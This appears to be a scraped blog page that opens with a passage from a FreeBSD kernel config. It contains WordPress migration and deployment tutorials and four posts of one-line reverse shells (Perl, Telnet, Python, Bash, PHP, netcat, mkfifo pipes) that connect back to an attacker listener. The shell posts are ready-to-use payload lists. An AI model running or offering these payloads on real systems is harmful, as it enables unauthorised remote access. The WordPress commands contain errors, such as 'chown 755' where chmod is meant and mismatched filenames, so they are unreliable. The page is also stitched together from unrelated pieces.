device splash # Splash screen and screen saver support

# syscons is the default console driver, resembling an SCO console
device sc
options SC_PIXEL_MODE # add support for the raster text mode
# vt is the new video console driver
device vt
device vt_vga
device vt_efifb

device agp # support several AGP chipsets

# PCI Ethernet NICs.
device em # Intel PRO/1000 Gigabit Ethernet Family

# Pseudo devices.
device loop # Network loopback
device random # Entropy device
device rdrand_rng # Intel Bull Mountain RNG
device ether # Ethernet support
device vlan # 802.1Q VLAN support

# The `bpf' device enables the Berkeley Packet Filter.
# Be aware of the administrative consequences of enabling this!
# Note that 'bpf' is required for DHCP.
device bpf # Berkeley packet filter

# USB support
device uhci # UHCI PCI->USB interface
device ohci # OHCI PCI->USB interface
device ehci # EHCI PCI->USB interface (USB 2.0)
device xhci # XHCI PCI->USB interface (USB 3.0)
device usb # USB Bus (required)
device ukbd # Keyboard
device umass # Disks/Mass storage - Requires scbus and da
# VirtIO support
device virtio # Generic VirtIO bus (required)
device virtio_pci # VirtIO PCI device
device vtnet # VirtIO Ethernet device
device virtio_blk # VirtIO Block device
device virtio_scsi # VirtIO SCSI device
device virtio_balloon # VirtIO Memory Balloon device

# Netmap provides direct access to TX/RX rings on supported NICs
device netmap # netmap(4) support

# The crypto framework is required by IPSEC
device crypto # Required by IPSEC
2020-07-24T10:31:33-04:00April 16th, 2020|Categories: Engineering|Tags: |

One of the Best Ways to Migrate WordPress

I’m going to show you how easy it is to migrate WordPress using only the command line. It is just as simple as installing it, in the first place. If you followed the tutorial on deploying wordpress from terminal successfully, you’ll have no trouble with this one.

Migrate WordPress from the Terminal

To be honest, unless you’re using the kick ass wp-cli tool. I’ve found that it’s easiest, and fastest, to use the command line to migrate WordPress. There’s no fiddling about with random plugins that’ll clutter up your database and bother you otherwise. And, in the end, it’s really only a few commands.

All we need to do is make sure we have all of the files and the file structure intact, as well as the database. If you’re moving from one domain name to another, you may need to find and replace in the database, everywhere your origin domain exists with your destination domain. Or, you could just update the website’s settings with your destination domain prior to performing the migration.

We’ll touch on fixing the configuration, if you forgot to update your domain before the migration, at the end.

Zip and Grab the WordPress Files

Go ahead and SSH into the machine hosting WordPress that you plan to migrate and zip up the entirety of the wordpress directory.

ssh <source host>
cd /var/www/html
sudo zip -r wordpress-migration.zip *
sudo mv wordpress-migration ~
compress files into a zip archive for a wordpress migration
zip -r target-zip-file.zip $path

You’ll see a lot of spam fly by as zip recursively compresses all of the files in preparation for our WordPress migration. Finally, I move the zip archive back to my user directory, where all that’s left for that part is to change the ownership to my user and pull it down. But, we still need the database or we won’t have anything for users or content or anything that matters.

Saving the WordPress Database for Migration

sudo mysql_dump -u wp_db_user -p wp_database > wordpress-database-backup.sql
Password:
chown mootiny:mootiny wordpress-database-backup.sql
chown mootiny:mootiny wordpress-backup.zip
extracting a SQL database for a WordPress migration
mysqldump backs dat ass up

Migrating the WordPress Website to the New Host

Now migrate your files to your new host. In case you haven’t noticed, this is exactly how you’d perform disaster recovery on a WordPress website that’d been compromised or suffered a hardware failure or anything else catastrophic. As well, it’s not far from manually deploying WordPress from the terminal either.

migrating wordpress files to a new host using sftp
put’n those files where they belong

Go ahead and use SFTP (which comes bundled with OpenSSH) to connect to your new host and transfer your backup for restoration and recovery.

sftp <destination host>
put wordpress-database-backup.sql
put wordpress-backup.zip

Now we simply extract the WordPress files on their new host. Then we will fix the file permissions. Create an empty database, database user and restore the SQL database at it’s new home.

creating a mariadb database and user, then granting the user access to the database, while manually performing a wordpress migration using only the terminal
creating the wordpress database and user for a wordpress migration (from terminal)

Change directories to webroot (if that’s where you want WordPress to live). Extract the files and proceed to log into the SQL server.

cd /var/www/html
sudo unzip ~/wordpress-backup.zip

Next we connect to our MariaDB server and create a shell for our WordPress website to move into.

sudo mysql -u root -p
Password:
MySQL> create database wp_database;
MySQL> grant all privileges on wp_database.* to 'wp_db_user'@localhost identified by 'wp_db_password';
MySQL> flush privileges;
MySQL> quit;

Now that we have a skeleton in place, all we need to do is restore the SQL content by populating the database with a quick one-liner and fix the file permissions and we’re golden!

mysql -u wp_db_user -p wp_database < wordpress-database-backup.sql

Setting the Correct Permissions after our WordPress Migration

restoring the WordPress database to MariaDB server and fixing the file permissions for a wordpress migration
fixing file permissions
chown -R www-data:www-data /var/www/html
find /var/www/html -type d -exec chown 755 {} \;
find /var/www/html -type f -exec chown 644 {} \;

And you’re done, browse to your new host and login through the web interface, like normal. :)

migrating wordpress from the terminal is successful!
ta-da!
2020-07-24T10:31:57-04:00April 15th, 2020|Categories: Engineering|Tags: , , , |

A Perfect WordPress Deployment using the Terminal

How to Manually Perform a WordPress Deployment

I’m going to walk you through a WordPress deployment, using only the terminal. This is mostly because I need to put some content up here. And, once upon a time, this used to be one of my staple articles. Nothing has changed, really. But, I will reiterate the fact that you really should know how to do things manually, because you start plowing ahead and automating them.

Automation is good, it’s absolutely necessary, even. But, when things break, it’s best that you’re able to figure it out how it happened. And, the easiest way to obtain that information is, sadly, the hard way.

WordPress being so evolved.. Please do not expect a WordPress deploy to be something you can’t handle. Deploying WordPress is very straightforward. So, let’s get started.

virtual guest linux debian in a vagrant
Linux Debian 9 as a vagrant guest

LAMP: Linux, Apache, MySQL and PHP

WordPress runs very well on almost any web server. But, for the purposes of sticking to the documentation, we’re going to use Apache (not that I always stick to the documentation, mind you). You should familiarize yourself with a “LAMP” deployment anyway, it’s pretty much what powers the entire internet. Please note that MySQL is often replaced with either MariaDB or Percona Server. I won’t go into the differences here.

Go ahead and SSH into your web server, update your software repository and do a full system upgrade. There’s no reason to deploy LAMP without the latest patches. I’m using debian, so your commands may be slightly different for these types of things. Refer to your distributions handbook, if you need to.

sudo apt update
sudo apt dist-upgrade
sudo apt install apache2 mariadb-server php-fpm

Enable the Necessary Apache Modules

Hah! Before, that required us grabbing a whole lot more packages than it does these days. But, don’t worry! We will still need to go get various PHP libraries for our WordPress deploy to be successful (specifically, for it to interact with mariadb). Still, you don’t need to do anything else there on Debian, unless Apache was previously configured with libapache2-mod-php. Then go ahead and issue the following (unexplained):

sudo a2dismod php
sudo a2dismod mpm_prefork
sudo a2enconf php7.3-fpm (at time of writing, 7.3 was stable)
sudo a2enmod mpm_event fcgid cgi proxy_fcgi setenvif rewrite
using terminal to swap apache modules for a manual wordpress deploy
Configure Apache

There’s plenty of other Apache modules that are beneficial for WordPress, but we’re just doing a deploy right now.

Prepare MariaDB for Production

I’m pretty sure that we all knew MySQL shipped with insecure defaults for many years. So, I have no idea, why this tradition has carried through to MariaDB. But, it’s my opinion, that we should damn not be having to still do this bit here. But, set a root password for the SQL db. And, disable remote access. Run ‘mysql_secure_installation’, press Y to everything and set a password.

Install the Minimum PHP Requirements

As I just said about Apache, there’s also plenty of PHP libraries that will benefit WordPress, but they’re beyond the scope of this walk through. So, we’re only going to grab what WordPress requires to install without complaint, as well as what is required to return a green health check.

sudo apt install php-mysql php-gd php-bz2 php-curl php-zip php-xml php-gmp php-intl php-mbstring php-xmlrpc php-token-stream php-mcrypt
manual wordpress deploy, installing required php modules
install php modules

I, honestly, don’t know what to tell you about PHP modules. Depending on your linux distribution, your PHP package is going to come with different modules. There’s really no telling what was bundled with it and what wasn’t. If you’re on Debian, this will get WordPress up and running, at least. But, on others, the packages will be named differently anyway. So, try to reach this minimum.

WordPress Deployed from Terminal

On Debian, Apache’s default “webroot” is in /var/www/html . Your “webroot” may be in a different location. If you don’t know, check your Apache configuration. It should be located in /etc/apache2 or /etc/httpd – The filename would either be apache2.conf or httpd.conf

Anyway, back to manually WordPress deploying from the terminal. I’ll have to clean this up later. But, for now, I’ll just finish what I started. Jump on over to webroot, grab the latest version from wordpress.org and extract it. All that’s left after that is to create a user for “MySQL”, set permissions and run the installer.

cd /var/www/html
wget https://wordpress.org/latest.zip
unzip latest.zip
quite literally deploying wordpress into a folder, out of compressed zip file
extract wordpress

Note: this next part you can ignore. What I am doing is deleting my webroot and moving the folder wordpress extracted to in place of my webroot. If you extracted wordpress into ./html/ then you don’t need to do this.

rm -rf ./html/
mv ./wordpress/ ./html/

Create a MySQL Database, a MySQL User, Marry Them

Now we need to create a MySQL database. Create a MySQL user and grant it privileges to write to the database. Then, fix the file permissions and we’re done with the terminal (the website is technically up, a that point.

mysql -u root -p (perhaps prefix with sudo, if you're not root)
mysql> create database wordpress;
mysql> grant all privileges on wordpress.* to 'wordpress'@localhost identified by 'p@ssword';
mysql> flush privileges;
mysql> quit
grant all privileges on WordPress Deploy to Deploy@WordPress identified by 'ASSWORD'
Identified by assword?!

Let’s set some privileges, first give the user that runs Apache ownership of the files. Then set the directories to read/write, read/write by Apache’s user and group. Finally, give the files read/write to Apache’s user and read/execute to everyone else (since php-fpm needs to read and run them).

Fix File Permissions and Be Done!

chown -R www-data:www-data /var/www/html
find /var/www/html -type d -exec chmod 755 {} ;
find /var/www/html -type f -exec chmod 644 {} ;

At this point, we really need to bust out our browser and complete the install, so we can prevent about a billion zombies from hammering away at our install script and owning the box (just log password attempts on WordPress for a week and you’ll see what I mean). So get your browser out and finish this bitch off! You’re done.

Good luck. Have fun! And, next map. If you’d like this handled for you, drop me a line at Gray Hat Freelancing!

wordpress initial configuration - final step of wordpress deployment
Porky Pig

FIN – Our Job Here is Done

There’s plenty more to do. Especially from a security standpoint. I can tell you right now, our file permissions are decent but not perfect. There’s optimizations that need to be made or your blog could become a zombie in a DDoS, etc.. But, those are for another article. For now, enjoy the WordPress deploy!

wordpress has been deployed - hello world
Hello World!
deploying wordpress - do the speak english in wordpress deployment?
Self-explanatory
wordpress database configuration - almost done with wordpress deployment
@ssword
2020-07-24T10:32:56-04:00April 10th, 2020|Categories: Engineering|Tags: , , , , , , , , |

Jeet Kune Crypto: Powerful Perl Reverse Shells

Let’s spawn a few perl reverse shells, in various environments. Why? Because Perl is that diverse.

 

Perl Reverse Shells

 

If you’re just getting into writing code, python comes heavily recommended. But, if code auditing is something you’re wanting to get into, jumping straight into perl might be more beneficial. And, yes, these are all built to be executed on a single line.

 

A linux reverse shell using /bin/sh

 

perl -e 'use Socket; $i="172.16.16.5"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S");open(STDOUT,">&S"); open(STDERR, ">&S"); exec("/bin/sh -i");};'

 

perl reverse shell connecting back to ncat
perl reverse shell connecting back
ncat listening for the perl reverse shell to connect
ncat listening and accepting

 

A Windows reverse shell using Perl

 

It’s actually not uncommon to find perl installed on Windows Servers

 

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);$_ while<>;'

 

Perl reverse shell without using /bin/sh

 

Perl is so versatile that we can do some amazing things with it. Watch us spawn a reverse shell without using a binary!

 

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

 

Feel free to comment, if you’ve got some more reverse shells. We do have moderation enabled, but we’re pretty lenient with the content here, at Gray Hat Freelancing.

2020-07-24T10:52:59-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , , |

Jeet Kune Crypto: Telnet Reverse Shells are Devastating

Reverse shells communicate in plaintext, by default. Telnet isn’t often installed by default any more. But, if it does exist on your target system, here are two one liners you can use to spawn a reverse shell with telnet.

Telnet Reverse Shells are Easy

rm -rf /tmp/p; mknod /tmp/p p && telnet 172.16.16.1 1234 0/tmp/p
telnet reverse shells
ugh… telnet

Another Simple Telnet Connect-Back Shell

telnet 172.16.16.1 1234 | /bin/bash | telnet 172.16.16.1 1235

As usual, in these reverse shell scenarios, your IP is 172.16.16.1 and your port is 1234. Telnet should be piped through an encrypted tunnel, unless you don’t mind people snooping on you.

2020-07-13T17:39:58-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , |

More One Line Reverse Shells

Jeet Kune Crypto: One Line Reverse Shells with Scripting Languages

Reverse shells are extremely useful for subverting firewalls or other security mechanisms that may block new opened ports. Often you’ll find hosts already have several scripting languages installed. We’re going to take advantage of the some of the most popular of those languages, to spawn a reverse shell.

In these scenarios, your listening IP is 172.16.16.1 and your listening port is 1234.

Python Reverse Shell:

This python one line reverse shell is kind of a trip. Trust me, nobody expects you to remember this one, off of the top of your head.

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("172.16.16.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

BASH Reverse Shell:

This one is simple. Everyone expects you to remember something like this, off of the top of your head.

bash -i >& /dev/tcp/172.16.16.1/1234 0>&1

PHP Reverse Shell:

From terminal:

php -r '$sock=fsockopen("172.16.16.1",1234);exec("/bin/sh" -i <&3 >&3 2>&3");'

 

2020-07-13T17:31:40-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: |

Jeet Kune Crypto: netcat (reverse shells)

Jeet Kune Crypto: netcat (reverse shells)

One of the most useful TCP/IP tools, for network and systems engineers, is netcat. Netcat is commonly referred to as the “TCP/IP Swiss Army Knife”. It is often flagged as malware or a “potentially unwanted program” by anti-malware software.

While traditional backdoors wait for you to connect (which netcat can also do). Here are a few ways that you can use it as a “reverse shell”, or a backdoor that connects back to you:

Versions that support "-e":
Linux:
nc -e "/bin/sh" <target> <target port>
Windows:
nc -e "cmd.exe" <target> <target port>

If the version of netcat that you’re using does not support “-e”, you’ll want to create a network socket out of a file. You can “hack” up a network socket on linux, like so:

mkfifo /tmp/socket;cat /tmp/socket|/bin/sh -i 2>&1|nc <target> <target port> > /tmp/socket

If you’re using netcat to listen for the incoming connection, you’d prepare to receive this type of connection like so:

nc <host> <port>
or for a range of ports
nc <host> <starting port>-<ending port>
2020-06-19T12:24:43-04:00April 5th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , |
Go to Top